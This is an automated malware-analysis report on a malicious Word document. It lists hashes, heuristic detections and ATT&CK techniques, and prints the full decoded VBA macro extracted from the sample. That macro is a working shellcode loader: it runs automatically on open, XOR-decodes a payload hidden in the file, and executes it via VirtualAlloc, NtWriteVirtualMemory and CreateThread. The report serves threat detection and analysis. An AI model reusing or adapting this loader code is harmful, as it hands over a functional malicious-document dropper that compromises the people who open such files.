Office (OLE) malware analysis — malicious · e687c4c8e413c355

MALICIOUS

Office (OLE)

134.0 KB Created: 2017-07-26 00:34:00 Authoring application: Microsoft Office Word First seen: 2018-03-04

MD5: 08ca1e50ec2df239a2680e2121bdac36 SHA-1: 8ec55dfb03cb1990e68374487cd432f39e4647af SHA-256: e687c4c8e413c355eb827b6b345bb264ed2c543c583ea541d9ee1111d5dda8e5

180 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros that leverage the CVE-2007-3899 vulnerability. This vulnerability allows for memory corruption, and the presence of VirtualAlloc API calls indicates the intention to allocate memory for malicious code execution. The VBA script attempts to create a thread to execute this allocated code, likely to download and run a second-stage payload.

Heuristics 8

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Public Sub Document_Open()
    yrSSaENfyOLNVMvhsISWlBGFg
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
    Document_Open
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4808 bytes
SHA-256: `50e9b3fc3b73898e881fc9b9db9008ddfbdd21ecc4080aa4923490b87f09396c`
Detection ClamAV: No threats found Obfuscation or payload: likely 37 of 71 identifiers look randomly generated (e.g. 'zZtIUQMXTRlfRuimkzSwdVjaDNFdvDYNbXOpIdig') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit #If VBA7 Then Private Declare PtrSafe Function qQPyqhwzEpVWiwZPUuByR Lib "kernel32" Alias "CreateThread" (ByVal QhMXnNPOyWvkvpRGeM As Long, ByVal HMGViKzssWXHulX As Long, ByVal tknanyDrQWUaOJkZMEwQjmEmNuw As LongPtr, BpaYyuxwRLijipfmQyDIMYUQO As Long, ByVal LhFbmSbM As Long, AWVBulNiavnHUgsvpRNeDujjs As Long) As LongPtr Private Declare PtrSafe Function nFXao Lib "kernel32" Alias "VirtualAlloc" (ByVal zpzaVvHKIxsdCP As Long, ByVal KbGicV As LongPtr, ByVal xDmxMpvgHjHXaPDboXeyLAJWIEM As Long, ByVal bLPnxF As Long) As LongPtr Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal WNyJsoBQivFPngZslXxjXTqPhD As LongPtr, ByVal fVuuzvYGnQoMjj As LongPtr, ByVal BAcPyVbtDpavUdxIBPWwUN As String, ByVal guoAL As LongPtr, ByRef XlnanrQMseweBQeyZd As LongPtr) As LongPtr #Else Private Declare Function qQPyqhwzEpVWiwZPUuByR Lib "kernel32" Alias "CreateThread" (ByVal QhMXnNPOyWvkvpRGeM As Long, ByVal HMGViKzssWXHulX As Long, ByVal tknanyDrQWUaOJkZMEwQjmEmNuw As Long, BpaYyuxwRLijipfmQyDIMYUQO As Long, ByVal LhFbmSbM As Long, AWVBulNiavnHUgsvpRNeDujjs As Long) As Long Private Declare Function nFXao Lib "kernel32" Alias "VirtualAlloc" (ByVal zpzaVvHKIxsdCP As Long, ByVal KbGicV As Long, ByVal xDmxMpvgHjHXaPDboXeyLAJWIEM As Long, ByVal bLPnxF As Long) As Long Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal WNyJsoBQivFPngZslXxjXTqPhD As Long, ByVal fVuuzvYGnQoMjj As Long, ByVal BAcPyVbtDpavUdxIBPWwUN As String, ByVal guoAL As Long, ByRef XlnanrQMseweBQeyZd As Long) As Long #End If Const cPnPipPWybkvBbeJXAfj = &H1000 Const eyOKfnFDMSRxzbTpi = &H40 Public Sub yrSSaENfyOLNVMvhsISWlBGFg() Dim BOnqQWxVYpAdNpmbPetynawXQ() As Byte BOnqQWxVYpAdNpmbPetynawXQ = FBGCIxH(ActiveDocument.FullName) Dim PxFXLmMicYRi As String PxFXLmMicYRi = StrConv(BOnqQWxVYpAdNpmbPetynawXQ, 64) Dim OpZOgHoVCJjMBlHDBspzzhZqaEnr OpZOgHoVCJjMBlHDBspzzhZqaEnr = Split(PxFXLmMicYRi, "zZtIUQMXTRlfRuimkzSwdVjaDNFdvDYNbXOpIdigNKgeceRRQLbckEADQsehkIBqTyeUGSEhqMItPeYzVOnKBWCxwkypYbVfiPlDaXlXgULyWhNMuFlwuQPXWGyvtpioQDkaSuyXDpEGkdApwMVsP") Dim mnkGhFinlqqBvnNvkjb As String Dim ppbYYeTmUQumnZLH As String Dim XJXTDxPWDeYrwePuFpmFD As String ppbYYeTmUQumnZLH = StrConv(StrConv(OpZOgHoVCJjMBlHDBspzzhZqaEnr(UBound(OpZOgHoVCJjMBlHDBspzzhZqaEnr)), 64), 128) XJXTDxPWDeYrwePuFpmFD = Mid$(ppbYYeTmUQumnZLH, 3, Len(ppbYYeTmUQumnZLH)) mnkGhFinlqqBvnNvkjb = tNdPXhhKrEPriLIFLRmcuZ("KsZoHtzPERLxHsWNUZh", XJXTDxPWDeYrwePuFpmFD) #If VBA7 Then Dim dRBOeovFmJheiiahXqzfdck As LongPtr Dim MitXcZluPMcsXp As LongPtr #Else Dim dRBOeovFmJheiiahXqzfdck As Long Dim MitXcZluPMcsXp As Long #End If dRBOeovFmJheiiahXqzfdck = nFXao(0, Len(mnkGhFinlqqBvnNvkjb), cPnPipPWybkvBbeJXAfj, eyOKfnFDMSRxzbTpi) MitXcZluPMcsXp = NtWriteVirtualMemory(-1, dRBOeovFmJheiiahXqzfdck, mnkGhFinlqqBvnNvkjb, Len(mnkGhFinlqqBvnNvkjb), 0) MitXcZluPMcsXp = qQPyqhwzEpVWiwZPUuByR(0, 0, dRBOeovFmJheiiahXqzfdck, 0, 0, 0) End Sub Public Function FBGCIxH(ByVal JNBtXqpwZfuG As String) As Byte() Dim ppbYYeTmUQumnZLH As Long Dim XJXTDxPWDeYrwePuFpmFD() As Byte ppbYYeTmUQumnZLH = FreeFile If LenB(Dir(JNBtXqpwZfuG)) Then Open JNBtXqpwZfuG For Binary Access Read As ppbYYeTmUQumnZLH ReDim XJXTDxPWDeYrwePuFpmFD(LOF(ppbYYeTmUQumnZLH) - 1&) As Byte Get ppbYYeTmUQumnZLH, , XJXTDxPWDeYrwePuFpmFD Close ppbYYeTmUQumnZLH Else Err.Raise 53 End If FBGCIxH = XJXTDxPWDeYrwePuFpmFD Erase XJXTDxPWDeYrwePuFpmFD End Function Public Sub Document_Open() yrSSaENfyOLNVMvhsISWlBGFg End Sub Sub Workbook_Open() Document_Open End Sub Public Function tNdPXhhKrEPriLIFLRmcuZ(UyLERHJybenpkPOzIPTNtBeWeMZD As String, tBptRiqmCqcHfN As String) As String Dim UvyQXrEnAlB As Long Dim uOAfHfeIDXVsGy As String Dim fzQgoORcIoj As Integer, mgMLjLVWsBffluCcAsIqe As Integer, a As Long For UvyQXrEnAlB = 1 To Len(tBptRiqmCqcHfN) a = UvyQXrEnAlB Mod Len(UyLERHJybenpkPOzIPTNtBeWeMZD) If a = 0 Then a = Len(UyLERHJybenpkPOzIPTNtBeWeMZD) fzQgoORcIoj = Asc(Mid$(tBptRiqmCqcHfN, UvyQXrEnAlB, 1)) mgMLjLVWsBffluCcAsIqe = Asc(Mid$(UyLERHJybenpkPOzIPTNtBeWeMZD, a, 1)) uOAfHfeIDXVsGy = uOAfHfeIDXVsGy + Chr(fzQgoORcIoj Xor mgMLjLVWsBffluCcAsIqe) Next UvyQXrEnAlB tNdPXhhKrEPriLIFLRmcuZ = uOAfHfeIDXVsGy End Function

Open this report in the interactive analyzer, or submit your own file for analysis.